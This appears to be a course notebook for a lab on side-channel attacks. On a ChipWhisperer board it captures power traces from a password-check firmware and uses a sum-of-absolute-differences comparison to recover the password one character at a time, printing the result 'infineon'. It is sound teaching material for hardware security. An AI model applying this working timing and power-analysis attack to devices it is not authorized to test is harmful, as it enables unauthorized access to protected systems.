# Lecture 2: Password Attack with Timing Analysis - Attack

In [1]:
import sys
sys.path.insert(0, '..')
import securec
from securec import util
scope, target = util.init()

In [2]:
securec.util.compile_and_flash('./1_password_fixed.c')

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2047 bytes
✓


In [3]:
import struct
import time
import warnings
    
scope.default_setup()
scope.adc.samples = 1000

def capture(attempt):
    scope.arm()
    target.simpleserial_write(0x01, attempt.encode() + b'\x00' * (10 - len(attempt)))
    result = target.simpleserial_read(0x01, 1)
    return util.capture(), bool(result[0])

## The sum of absolute differences
In this example we want to see how a technique called SAD (sum of absolute differences) is useful to auto-detect whether a character was correct or not.
Given two traces $t_1, t_2$ their SAD value is defined as:
$$\text{SAD}(t_1, t_2) := \sum_i \big| t_1[i] - t_2[i] \big|,$$
where $t[i]$ is the value of trace $t$ at point $i$.

In [4]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Visualize SAD

In [5]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool
from bokeh.palettes import Category10_10

output_notebook()

Loading BokehJS ...

In [6]:
traces = [(attempt, capture(attempt)[0]) for attempt in ('', 'a', 'i')]

ERROR:ChipWhisperer Target:Device did not ack


In [7]:
p = figure(width=900, height=200)
p.add_tools(CrosshairTool())
for idx, ((attempt1, trace1), (attempt2, trace2)) in enumerate([
    (traces[0], traces[1]),
    (traces[0], traces[2]),
]):
    p.line(
        range(len(trace1)), 
        abs(trace1 - trace2), 
        line_color=Category10_10[idx],
        legend_label=f'abs("{attempt1}" - "{attempt2}") with SAD = {sad(trace1, trace2):.2f}'
    )
show(p)

## Automated attack

In [8]:
def attack_password_sad(
    sad_threshold=20,
    charlist='abcdefghijklmnopqrstuvwxyz0123456789'
):
    result = False
    password = ''

    while not result or len(password) > 9:
        basetrace, _ = capture(password)
        for c in charlist:
            trace, result = capture(password + c)
            if sad(trace, basetrace) > sad_threshold:
                password += c
                print(f'success: "{c}" => password = {password}')
                break
        else:
            print('no found')
            break
    return password, result

In [9]:
attack_password_sad()

success: "i" => password = i
success: "n" => password = in
success: "f" => password = inf
success: "i" => password = infi
success: "n" => password = infin
success: "e" => password = infine
success: "o" => password = infineo
success: "n" => password = infineon


('infineon', True)

In [10]:
util.exit()